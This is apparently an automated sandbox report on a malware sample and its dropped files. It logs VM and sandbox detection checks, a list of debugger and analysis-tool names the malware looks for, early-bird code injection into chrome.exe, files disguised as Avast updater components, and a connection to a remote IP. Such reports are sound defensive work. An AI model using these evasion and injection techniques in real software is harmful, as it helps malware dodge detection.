Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Windows\SysWOW64\svchost.exe

Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\svchost.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	API/Special instruction interceptor: Address: 7FF84F7AD044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FF84F7AD044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 52BB83A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 584B83A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 586B83A
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	API/Special instruction interceptor: Address: 7FF84F7AD044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 4DFB83A

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU
Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA
Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TORUNS.EXEDUMPCAP.EXEDE4
Source: svchost.exe, 00000006.00000002.1523710154.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Memory allocated: E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Memory allocated: 1AD00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Memory allocated: 2770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Memory allocated: 1A7F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Memory allocated: 15D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Memory allocated: 1B0B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Memory allocated: 1AB70000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: VBoxGuest
Source: C:\Windows\SysWOW64\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: C:\Windows\SysWOW64\vboxservice.exe
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: C:\Windows\SysWOW64\vboxtray.exe
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: VBoxTrayIPC
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: C:\Windows\SysWOW64\vboxhook.dll
Source: C:\Windows\SysWOW64\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\SysWOW64\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: VBoxMiniRdrDN
Source: C:\Windows\SysWOW64\svchost.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
Source: C:\Windows\SysWOW64\svchost.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Window / User API: threadDelayed 3521			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Window / User API: threadDelayed 6283			Jump to behavior

Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe			Jump to dropped file
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Avt\goopdate.dll			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_2-49362
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_1-47253

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	API coverage: 8.9 %
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	API coverage: 6.4 %
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	API coverage: 9.7 %

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe TID: 8336	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe TID: 8520	Thread sleep count: 3521 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe TID: 8520	Thread sleep time: -105630000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe TID: 8524	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe TID: 8520	Thread sleep count: 6283 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe TID: 8520	Thread sleep time: -188490000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe TID: 8644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe TID: 7052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe TID: 2032	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0B9CC0 CloseHandle,FindFirstFileExW,FindClose,	1_2_6D0B9CC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0D6E3D FindFirstFileExW,	1_2_6D0D6E3D
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0089EF71 FindFirstFileExW,	1_2_0089EF71
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C829CC0 CloseHandle,FindFirstFileExW,FindClose,	2_2_6C829CC0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C846E3D FindFirstFileExW,	2_2_6C846E3D
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0088EF71 FindFirstFileExW,	2_2_0088EF71
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4F4EAD FindFirstFileExW,	5_2_6C4F4EAD
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00619608 FindFirstFileExW,	5_2_00619608
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000C9608 FindFirstFileExW,	15_2_000C9608

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_008693D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

1_2_008693D0

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: update.exe, 00000001.00000003.1327036007.000000000083D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rdha.exe, 0000000F.00000003.1620149862.0000000003080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: svchost.exe, 00000006.00000002.1523026846.0000000002E00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.1523227832.0000000002E12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: rdha.exe, 0000000F.00000003.1620149862.0000000003080000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: svchost.exe, 00000006.00000002.1523587884.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSAFD RfComm [Bluetooth]Hyper-V RAWRSVP UDPv6 Service Provider

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	API call chain: ExitProcess graph end node	graph_1-47251
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	API call chain: ExitProcess graph end node	graph_2-49360
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_6D0D678C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6D0D678C

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

1_2_6D0C0EC0

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0088DB60 mov eax, dword ptr fs:[00000030h]	1_2_0088DB60
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_00895FF2 mov eax, dword ptr fs:[00000030h]	1_2_00895FF2
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0087DB60 mov eax, dword ptr fs:[00000030h]	2_2_0087DB60
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00885FF2 mov eax, dword ptr fs:[00000030h]	2_2_00885FF2
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_00550277 mov eax, dword ptr fs:[00000030h]	5_3_00550277
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00550277 mov eax, dword ptr fs:[00000030h]	5_2_00550277
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_3_02A80283 mov eax, dword ptr fs:[00000030h]	6_3_02A80283
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_3_00100277 mov eax, dword ptr fs:[00000030h]	15_3_00100277
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_00100277 mov eax, dword ptr fs:[00000030h]	15_2_00100277
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 16_3_02E10283 mov eax, dword ptr fs:[00000030h]	16_3_02E10283

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_6D0D8560 GetProcessHeap,

1_2_6D0D8560

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0D678C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6D0D678C
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0D1045 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6D0D1045
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0D13FF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6D0D13FF
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0088A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0088A1A5
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0088A308 SetUnhandledExceptionFilter,	1_2_0088A308
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_008898B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_008898B8
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0088EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0088EB6D
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C84678C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C84678C
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C841045 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C841045
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C8413FF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C8413FF
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0087A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0087A1A5
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0087A308 SetUnhandledExceptionFilter,	2_2_0087A308
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_008798B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_008798B8
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0087EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0087EB6D
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4EF46F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6C4EF46F
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4F47FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6C4F47FC
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4EF0B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6C4EF0B5
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_0060800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0060800F
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00607D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00607D4D
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00614B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00614B0C
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000B800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_000B800F
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000B7D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000B7D4D
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000C4B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000C4B0C

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\System32\svchost.exe	Process created / APC Queued / Resumed: C:\Program Files\Google\Chrome\Application\chrome.exe
Source: C:\Windows\System32\svchost.exe	Process created / APC Queued / Resumed: C:\Program Files\Google\Chrome\Application\chrome.exe

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 96.9.125.78 1432

Allocates memory in foreign processes

Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1CCED230000 protect: page read and write
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1E7BC3B0000 protect: page read and write
